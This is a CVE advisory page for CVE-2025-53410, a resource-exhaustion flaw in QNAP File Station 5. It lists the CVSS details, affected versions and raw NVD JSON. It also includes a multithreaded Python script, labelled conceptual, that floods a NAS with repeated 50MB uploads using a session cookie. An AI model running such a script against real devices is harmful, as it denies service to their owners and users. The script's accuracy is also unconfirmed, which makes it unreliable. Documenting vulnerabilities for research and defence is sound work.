Security Vulnerability Report
中文
CVE-2025-53410 CVSS 6.5 MEDIUM

CVE-2025-53410

Published: 2025-11-07 16:15:39
Last Modified: 2025-11-14 20:11:01
Source: [email protected]

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: File Station 5 5.5.6.5018 and later

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:* - VULNERABLE
File Station 5 < 5.5.6.5018

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53410 PoC - Resource Exhaustion via File Station 5 # Note: This is a conceptual PoC for educational purposes import requests import concurrent.futures import argparse def exhaust_resources(target_url, session_cookie, num_requests=100): """ Simulate resource exhaustion attack against QNAP File Station 5 by creating excessive file operations """ headers = { 'Cookie': f'NAS_SID={session_cookie}', 'User-Agent': 'FileStation-Agent/5.5.6' } # Example: Upload large files repeatedly to exhaust resources endpoint = f'{target_url}/cgi-bin/filemanager/utilRequest.cgi' for i in range(num_requests): try: files = { 'file': ('large_file.bin', b'\x00' * 1024 * 1024 * 50) # 50MB file } data = { 'func': 'upload', 'source': 'local', 'dest_path': f'/Shared/malicious_{i}' } response = requests.post(endpoint, headers=headers, files=files, data=data, timeout=30) print(f'Request {i+1}/{num_requests} - Status: {response.status_code}') except Exception as e: print(f'Request {i+1} failed: {e}') def main(): parser = argparse.ArgumentParser(description='CVE-2025-53410 PoC') parser.add_argument('--target', required=True, help='Target QNAP NAS URL') parser.add_argument('--cookie', required=True, help='Valid session cookie') parser.add_argument('--threads', type=int, default=10, help='Number of concurrent threads') args = parser.parse_args() print(f'Starting resource exhaustion attack on {args.target}') with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor: futures = [executor.submit(exhaust_resources, args.target, args.cookie) for _ in range(args.threads)] concurrent.futures.wait(futures) print('Attack completed') if __name__ == '__main__': main() # Mitigation: Upgrade to File Station 5.5.6.5018 or later

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53410", "sourceIdentifier": "[email protected]", "published": "2025-11-07T16:15:39.410", "lastModified": "2025-11-14T20:11:00.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5018 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:file_station:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5.6.4691", "versionEndExcluding": "5.5.6.5018", "matchCriteriaId": "A8CD1AA7-AC4B-4100-9789-50556BA83F52"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-38", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.